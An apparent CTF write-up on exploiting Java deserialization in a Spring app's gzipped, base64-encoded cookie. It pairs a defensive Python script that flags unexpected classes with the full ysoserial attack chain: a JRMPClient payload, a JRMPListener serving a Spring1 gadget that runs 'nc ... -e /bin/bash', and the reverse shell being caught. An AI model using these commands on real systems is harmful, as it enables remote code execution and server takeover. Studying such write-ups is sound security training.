Too Many Credits 2

Even if you could get the first flag, I bet you can't pop a shell!


Same server as "Too many credits 1".

We get a cookie containing base64 -> gzip -> Java serialized data. Possible RCE via deserialization.


  • Analyze "normal" serialized data in cookie
  • Enumerate technologies used (maybe spring/springboot?)
  • Springframework is in use, no specific version identified


Server responds to any URI with the main routine, e.g:

  • /klsajlfksdjfljdslak results in the main page being shown.
  • /favicon.ico actually results in an icon.

Trying a different method to see what happens:

$ curl -X DELETE ''
{
    "error": "Method Not Allowed",
    "exception": "org.springframework.web.HttpRequestMethodNotSupportedException",
    "message": "Request method 'DELETE' not supported",
    "path": "/",
    "status": 405,
    "timestamp": 1584723698736
}

Given that, we know that at least the package org.springframework.web is loaded in the classpath of some classloader. We would have to see whether we can find gadgets in spring-web itself or in any of its dependencies, along with the usual suspects, e.g. Apache Commons.
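The first analysis step above (looking at the "normal" serialized data in the cookie) and the gadget question both come down to the same check: which classes does the stream actually name, and are they the ones the application expects? The following Python script is an added example written for this writeup, not tooling from the challenge or from ysoserial. It unwraps a cookie the way the writeup observed (base64 -> gzip -> Java serialization stream), verifies the stream magic, pulls out class names with a heuristic scan for TC_CLASSDESC records, and flags anything outside an allowlist. The class name com.example.credits.CreditState and the allowlist are assumptions for the sample; the sample streams are constructed inline so the script runs offline.

```python
import base64
import gzip
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # ObjectOutputStream header: magic 0xACED, version 5
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70

# Classes the application legitimately stores in the cookie. Hypothetical name;
# for a real deployment, fill this from a known-good cookie.
EXPECTED_CLASSES = {"com.example.credits.CreditState"}

# Java class names: dotted identifiers, plus [ and ; for array descriptors.
NAME_RE = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$.;\[]*$")


def build_sample_stream(class_name: str) -> bytes:
    """Constructed sample: a serialization stream holding one object of
    `class_name` with zero fields. Exists only to give this script offline input."""
    name = class_name.encode()
    return (
        STREAM_MAGIC
        + bytes([TC_OBJECT, TC_CLASSDESC])
        + struct.pack(">H", len(name)) + name   # className as modified UTF-8
        + b"\x00" * 8                           # serialVersionUID (arbitrary here)
        + b"\x02"                               # classDescFlags: SC_SERIALIZABLE
        + b"\x00\x00"                           # field count: 0
        + bytes([TC_ENDBLOCKDATA, TC_NULL])     # no annotations, no superclass
    )


def encode_cookie(stream: bytes) -> str:
    """Same wrapping the writeup observed: serialized -> gzip -> base64."""
    return base64.b64encode(gzip.compress(stream)).decode()


def decode_cookie(cookie: str) -> bytes:
    """Reverse the wrapping and insist on a Java serialization stream header."""
    raw = gzip.decompress(base64.b64decode(cookie))
    if not raw.startswith(STREAM_MAGIC):
        raise ValueError("cookie does not contain a Java serialization stream")
    return raw


def class_names(stream: bytes) -> list[str]:
    """Heuristic scan: every TC_CLASSDESC byte followed by a plausible
    length-prefixed class name. Good enough for triage; not a full parser."""
    found = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            n = struct.unpack(">H", stream[i + 1:i + 3])[0]
            name = stream[i + 3:i + 3 + n]
            if n and len(name) == n and NAME_RE.match(name):
                found.append(name.decode())
                i += 3 + n
                continue
        i += 1
    return found


def triage_cookie(cookie: str) -> dict:
    """Decode a cookie and report any class the application never stores."""
    names = class_names(decode_cookie(cookie))
    unexpected = [n for n in names if n not in EXPECTED_CLASSES]
    return {"classes": names, "unexpected": unexpected, "suspicious": bool(unexpected)}


if __name__ == "__main__":
    benign = encode_cookie(build_sample_stream("com.example.credits.CreditState"))
    odd = encode_cookie(build_sample_stream("org.example.NotInAllowlist"))
    print(triage_cookie(benign))
    print(triage_cookie(odd))
```

The allowlist approach is the same idea the JVM offers natively since JEP 290: an `ObjectInputFilter` (or the `jdk.serialFilter` system property) that rejects any class not explicitly permitted before it is instantiated. Running this kind of check at the edge, or logging every class name seen in session cookies, turns "someone sent a cookie naming classes we never store" into a detectable event rather than a silent deserialization.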

Available ysoserial gadgets

The JRMPClient payload seems to work. We need a server listening for JRMP connections; ysoserial's listener does that and delivers a payload that will hopefully do the job. Payloads tested:

Payload generation with JRMPClient

$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient 'redacted:2020' | gzip - | base64 | tr -d '\n'

Set up a JRMPListener on the server on port 2020, and a listener for a shell on port 2025:

~/ysoserial# java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 2020 Spring1 'nc redacted 2025 -e /bin/bash'
* Opening JRMP listener on 2020

We make an HTTP request with our payload as the cookie and get a connection back:

misc:~# nc -lvp 2025
listening on [any] 2025 ...
connect to [] from [] 43713
cat flag
cat flag.txt